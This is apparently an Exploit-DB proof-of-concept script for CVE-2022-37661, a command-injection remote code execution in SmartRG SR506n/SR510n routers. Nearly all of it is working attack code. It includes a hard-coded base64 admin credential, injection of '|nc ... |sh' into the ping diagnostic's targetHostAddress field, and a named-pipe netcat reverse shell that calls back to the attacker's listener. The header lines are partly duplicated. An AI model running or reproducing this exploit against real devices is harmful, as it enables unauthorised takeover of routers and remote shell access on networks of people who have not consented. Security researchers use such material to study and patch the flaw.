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# Exploit Title: SmartRG Router - Remote Code Execution
# Date: 13/06/2022
# Exploit Author: Yerodin Richards
# Vendor Homepage:
# Version: 2.5.15 / 2.6.13 (conf # Exploit Title: SmartRG Router - Remote Code Execution
# Date: 13/06/2022
# Exploit Author: Yerodin Richards
# Vendor Homepage:
# Version: 2.5.15 / 2.6.13 (confirmed)
# Tested on: SR506n (2.5.15) & SR510n (2.6.13)
# CVE : CVE-2022-37661

import requests
from subprocess import Popen, PIPE

router_host = ""
authorization_header = "YWRtaW46QWRtMW5ATDFtMyM="

lhost = "lo"
lport = 80

payload_port = 81

def main():
e_proc = Popen(["echo", f"rm /tmp/s & mknod /tmp/s p & /bin/sh 0< /tmp/s | nc {lhost} {lport} > /tmp/s"], stdout=PIPE)
Popen(["nc", "-nlvp", f"{payload_port}"], stdin=e_proc.stdout)
send_payload(f"|nc {lhost} {payload_port}|sh")
print("done.. check shell")

def get_session():
url = router_host + "/admin/ping.html"
headers = {"Authorization": "Basic {}".format(authorization_header)}
r = requests.get(url, headers=headers).text
i = r.find("&sessionKey=") + len("&sessionKey=")
s = ""
while r[i] != "'":
s = s + r[i]
i = i + 1
return s

def send_payload(payload):
url = router_host + "/admin/pingHost.cmd"
headers = {"Authorization": "Basic {}".format(authorization_header)}
params = {"action": "add", "targetHostAddress": payload, "sessionKey": get_session()}
requests.get(url, headers=headers, params=params).text
